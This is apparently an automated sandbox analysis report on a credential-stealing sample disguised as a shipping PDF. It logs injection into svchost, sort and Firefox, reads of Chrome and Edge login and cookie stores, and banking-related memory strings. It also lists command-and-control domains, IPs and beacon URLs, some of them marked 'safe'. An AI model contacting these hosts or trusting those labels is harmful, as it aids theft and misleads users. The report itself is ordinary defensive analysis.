Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00418084 push ebp; ret	8_2_00418091
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004160B9 push edx; ret	8_2_004160F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00407173 push 4AC4F0F0h; ret	8_2_0040719B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00416121 push edx; ret	8_2_004160F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00417985 push ds; retf	8_2_00417986
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040A990 push ecx; iretd	8_2_0040A992
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041E265 push ebp; iretd	8_2_0041E2C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004032E0 push eax; ret	8_2_004032E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00413DF7 push es; ret	8_2_00413DF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00401DB2 push esp; iretd	8_2_00401DB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00413DB5 push es; ret	8_2_00413DF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00401DB5 push esp; iretd	8_2_00401DB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00401DB5 push ebp; iretd	8_2_00401E31
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041167E push ebx; ret	8_2_00411690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004186B9 push ecx; ret	8_2_004186CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00418778 push 9D5E7F8Fh; retf	8_2_0041878A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040CFBA push edi; iretd	8_2_0040CFBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036309AD push ecx; mov dword ptr [esp], ecx	8_2_036309B6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038F09AD push ecx; mov dword ptr [esp], ecx	11_2_038F09B6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F88261 push edx; retf	11_2_02F881C3
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F853D6 push ecx; ret	11_2_02F853EC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7E39B push ebx; ret	11_2_02F7E3AD
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F87320 push es; retf	11_2_02F873C5
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F91321 push ebp; ret	11_2_02F91322
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F8D0FB push esi; ret	11_2_02F8D0FC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F776AD push ecx; iretd	11_2_02F776AF
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F846A2 push ds; retf	11_2_02F846A3
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F85495 push 9D5E7F8Fh; retf	11_2_02F854A7

Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\shipping notification_pdf.exe	API/Special instruction interceptor: Address: 433E43C
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\sort.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\sort.exe	API coverage: 3.1 %

Source: C:\Windows\SysWOW64\sort.exe TID: 3020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe TID: 3020	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe TID: 3020	Thread sleep count: 9836 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe TID: 3020	Thread sleep time: -19672000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\sort.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sort.exe	Last function: Thread delayed

Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 30G910fd.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 30G910fd.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 30G910fd.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: entralVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20
Source: 30G910fd.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 30G910fd.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers - non-EU EuropeVMware20,116
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 30G910fd.11.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hdfcbank.comVMware20,11696492231
Source: sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w.interactivebrokers.comVMware20
Source: 30G910fd.11.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 30G910fd.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 30G910fd.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 30G910fd.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 30G910fd.11.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 30G910fd.11.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696492231\|
Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lobal passwords blocklistVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: firefox.exe, 0000000E.00000002.1912870961.00000221B61DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 30G910fd.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 30G910fd.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 30G910fd.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 30G910fd.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 30G910fd.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sort.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: shipping notification_pdf.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.sapatarias.online	United States	16509	AMAZON-02US	false
208.91.197.27	www.antura.partners	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
43.154.104.247	www.nmh6.site	Japan	4249	LILLY-ASUS	false
38.180.87.102	www.skystargazeguide.store	United States	174	COGENT-174US	false
3.33.130.190	softillery.info	United States	8987	AMAZONEXPANSIONGB	false
162.0.238.238	www.priunit.online	Canada	22612	NAMECHEAP-NETUS	false
34.76.205.124	www.exhibitarrange.shop	United States	15169	GOOGLEUS	false

Name	IP	Active
www.antura.partners	208.91.197.27	true
www.nmh6.site	43.154.104.247	true
softillery.info	3.33.130.190	true
www.skystargazeguide.store	38.180.87.102	true
www.sapatarias.online	13.248.169.48	true
asiapartnars.online	3.33.130.190	true
www.priunit.online	162.0.238.238	true
www.exhibitarrange.shop	34.76.205.124	true
consultarfacil.online	3.33.130.190	true
www.48vlu.shop	unknown	unknown
www.consultarfacil.online	unknown	unknown
18.31.95.13.in-addr.arpa	unknown	unknown
www.asiapartnars.online	unknown	unknown
www.softillery.info	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.skystargazeguide.store/jnnq/	false	Avira URL Cloud: safe	unknown
http://www.exhibitarrange.shop/yxqi/	false	Avira URL Cloud: safe	unknown
http://www.asiapartnars.online/43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy	false	Avira URL Cloud: safe	unknown
http://www.skystargazeguide.store/jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown
http://www.asiapartnars.online/43nw/	false	Avira URL Cloud: safe	unknown
http://www.softillery.info/05bk/	false	Avira URL Cloud: safe	unknown
http://www.consultarfacil.online/f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6	false	Avira URL Cloud: safe	unknown
http://www.antura.partners/w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown
http://www.priunit.online/orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown
http://www.priunit.online/orig/	false	Avira URL Cloud: safe	unknown
http://www.consultarfacil.online/f1ix/	false	Avira URL Cloud: safe	unknown
http://www.nmh6.site/aqh8/	false	Avira URL Cloud: safe	unknown
http://www.sapatarias.online/3632/	false	Avira URL Cloud: safe	unknown
http://www.nmh6.site/aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown
http://www.sapatarias.online/3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown
